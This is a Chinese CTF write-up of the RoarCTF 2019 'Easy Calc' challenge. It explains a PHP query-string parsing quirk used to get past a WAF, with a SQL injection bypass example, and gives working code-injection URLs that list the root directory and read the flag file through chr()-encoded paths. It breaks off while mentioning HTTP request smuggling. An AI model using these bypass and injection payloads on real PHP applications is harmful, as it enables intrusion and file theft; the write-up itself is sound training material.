[RoarCTF 2019]Easy Calc笔记

[RoarCTF 2019]Easy Calc

一.首先打开题目发现一个“计算器”，随便输入后发现没什么用
然后查看源码：

发现有waf：

`
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })`

注意到这一句：url:“calc.php?num=”+encodeURIComponent($("#content").val()),就访问一下calc.php:

可以看出黑名单过滤了一些字符

补充知识点：
scandir()函数：返回指定目录中的文件和目录的数组
扫根目录下的所有文件，也就是是scandir("/")
var_dump()：输出变量的相关信息
chr() — 返回指定的字符
file_get_contents() — 将整个文件读入一个字符串
这是别人对PHP字符串解析漏洞的理解，
我们知道PHP将查询字符串（在URL或正文中）转换为内部${}_{G}ET或的关联数组$_POST。例如：/?foo=bar变成Array([foo] => “bar”)。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：
/news.php?%20news[id%00=42"+AND+1=0–
上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。
HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：
1.删除空白符
2.将某些字符转换为下划线（包括空格）

二.接下来就自己尝试写payload：
首先 通过 chr(‘’) scandir() 搜寻目录（列出 参数目录 中的文件和目录，要不然我们怎么知道flag在哪）

输入 num(num前有一个空格,如果num前无空格，则返回一下forbidden，这个应该就是waf了，利用PHP的字符串解析特性就能够进行绕过waf)

由于scandir("/")扫描根目录时，过滤了"/",就用ASCII绕过,即
http://node4.buuoj.cn:26415/calc.php?%20num=a;var_dump(scandir(chr(47)))
得到

可以发现有f1agg，这里需要注意的是数字1，而非字母l

打印该文件var_dump(file_get_contents(chr(102).chr(49).chr(97).chr(103).chr(103)))等价于

var_dump(file_get_contents(“flagg”))，但返回bool（false），原来是路径问题 添加 /，

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))，

得到flag：astring(43) "flag{3c6f0607-f4c3-44a9-ad52-6c3f8b4edeba} "

除了此方法外，看到别人有另一种解法（参考：HTTP走私攻击）
形成原因
用burpsuite抓包再构造：